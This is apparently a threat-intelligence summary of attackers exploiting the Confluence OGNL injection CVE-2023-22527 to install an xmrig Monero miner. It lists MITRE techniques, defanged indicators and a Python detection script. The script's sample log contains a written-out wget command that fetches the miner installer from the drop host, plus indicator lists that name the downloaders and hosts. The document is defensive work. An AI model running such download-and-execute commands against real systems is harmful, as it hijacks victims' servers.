Keypoints
- Atlassian disclosed CVE-2023-22527: an unauthenticated OGNL injection in Confluence Data Center/Server that enables arbitrary code execution.
- Public PoCs and exploits appeared quickly, and researchers observed mass scanning and exploitation attempts (>620K attempts from ~2.8K IPs).
- Observed exploitation included injected Wget commands that download and execute a C3Pool xmrig_setup installer (setup_c3pool_miner.sh and xmrig.tar.gz).
- Multiple URLs and SHA-256 hashes tied to the miner were documented, plus additional URLs/IPs hosting malicious payloads.
- The same wallet address tied to these drops has appeared in prior campaigns (e.g., Log4Shell exploitation), indicating reuse across campaigns.
- Similar Confluence RCEs (CVE-2021-26084, CVE-2022-26134) were previously abused for cryptomining and botnet propagation.
- Imperva Cloud WAF and WAF Gateway provide out-of-the-box protection against this vulnerability.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – CVE-2023-22527 is an unauthenticated OGNL injection in Confluence enabling remote code execution. (‘a critical vulnerability affecting Confluence Data Center and Confluence Server…an unauthenticated OGNL injection bug, allowing unauthenticated attackers to execute Java expressions…essentially enabling arbitrary code execution on the vulnerable server’)
- [T1046] Network Service Scanning – Attackers performed large-scale scanning and exploitation attempts against Confluence instances. (‘mass scanning and attempted exploitation…with over 620K scanning and exploitation attempts from over 2.8K IPs’)
- [T1059] Command and Scripting Interpreter – The OGNL payloads executed shell commands (e.g., wget) to retrieve and run miner installation scripts. (‘include Wget commands in the injected OGNL expression’)
- [T1105] Ingress Tool Transfer – Payloads downloaded files from remote hosts (e.g., setup_c3pool_miner.sh, xmrig.tar.gz) to the compromised server. (‘the command will download a file from the url “hxxp://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh”’)
- [T1496] Resource Hijacking – Compromised servers were used to run cryptomining software (xmrig) to mine Monero and consume victim compute resources. (‘designed to allow crypto enthusiasts to leverage available computing resources to mine currency’)
Indicators of Compromise
- [URLs] payload distribution and installers – hxxp://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh, hxxp://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz, and 5 other URLs observed.
- [SHA-256 Hashes] observed malicious binaries/scripts – 0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e, 1785704767c1b3cff1c0414ac6be875a139a25054c306ce5da59c65fb52ad3b5, and 1 more hash.
- [IP Addresses / Hosts] alternate payload hosts – 103.215.77.51:15679 (shx), 38.6.173.11 (multiple scripts/executables), used as drop/hosting points for additional payloads.
Technical summary: CVE-2023-22527 is an unauthenticated OGNL injection in Atlassian Confluence that allows attackers to evaluate Java expressions and achieve remote code execution on vulnerable servers. Public proof-of-concept exploits appeared quickly after disclosure, and researchers observed large-scale scanning followed by exploitation attempts that embed shell commands directly in the OGNL payload.
Exploitation procedure observed: attackers inject OGNL expressions that run wget/curl commands to fetch installer artifacts (notably setup_c3pool_miner.sh and xmrig.tar.gz) from remote hosts (examples: hxxp://download.c3pool.org/… and several IP-hosted URLs). The downloaded bash script is part of the C3Pool xmrig_setup framework; execution of that script installs and launches the xmrig Monero miner. Detected SHA-256 hashes for related files include 0bade474…549e and 17857047…3b5, with additional hashes and hosting URLs recorded.
Impact and operational notes: this pattern closely mirrors prior Confluence RCE abuses (CVE-2021-26084, CVE-2022-26134) where public exploits were used to deploy cryptominers and botnet components; operators also reused wallet addresses across campaigns. Defenders should block the known URLs/IPs, monitor for wget/curl spawned by Confluence processes, validate file hashes, and apply patches or WAF rules—Imperva Cloud WAF/WAF Gateway were noted to provide immediate protection.
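A small detection pass over process-creation events that applies the checks recommended above (downloader spawned by Confluence, command lines referencing the documented drop hosts and installer names, file hashes matching the listed SHA-256 values), added here as an illustrative example and not Imperva's code. The key=value event format, the field names (ts, parent_cmdline, image, cmdline, sha256) and the sample log lines are constructed assumptions; the indicators themselves come from the list above.

```python
import re

# Indicators documented above: miner artifact hashes, drop hosts, installer names.
KNOWN_HASHES = {"0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e",
                "1785704767c1b3cff1c0414ac6be875a139a25054c306ce5da59c65fb52ad3b5"}
KNOWN_MARKERS = ("download.c3pool.org", "setup_c3pool_miner.sh",
                 "xmrig.tar.gz", "103.215.77.51", "38.6.173.11")
# key=value or key="quoted value" fields; the field names are an assumption.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Turn one process-creation log line into a dict of fields."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}

def classify(event):
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    binary = event.get("image", "").rsplit("/", 1)[-1]
    parent = event.get("parent_cmdline", "").lower()
    cmdline = event.get("cmdline", "")
    # Confluence runs as a Java process whose command line carries its install path.
    if binary in ("wget", "curl") and "confluence" in parent:
        reasons.append("downloader spawned by Confluence")
    if any(marker in cmdline for marker in KNOWN_MARKERS):
        reasons.append("known drop host or installer in command line")
    if event.get("sha256") in KNOWN_HASHES:
        reasons.append("hash matches documented miner artifact")
    return reasons

def scan(lines):
    """Map each timestamp to its reasons, for every line that trips a rule."""
    hits = {}
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits[event.get("ts", "?")] = reasons
    return hits

# Constructed sample events (URL defanged as in the article), not real telemetry.
SAMPLE_LOG = [
    'ts=1 parent_cmdline="/opt/java/bin/java -Dcatalina.home=/opt/atlassian/confluence" '
    'image=/usr/bin/wget cmdline="wget hxxp://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh -O /tmp/s.sh"',
    'ts=2 parent_cmdline="/bin/bash /usr/lib/apt/apt.systemd.daily" '
    'image=/usr/bin/curl cmdline="curl -s https://deb.debian.org/debian/dists/Release"',
    'ts=3 parent_cmdline="/bin/bash /tmp/s.sh" image=/tmp/c3pool/xmrig cmdline="/tmp/c3pool/xmrig -c config.json" '
    'sha256=0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e',
]
```

Feeding real telemetry requires only mapping your sensor's parent/child command-line and hash fields onto the assumed names; the benign apt-triggered curl in the sample shows the parent check is what keeps ordinary downloads out of the alert set.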
Read more: https://www.imperva.com/blog/attackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery/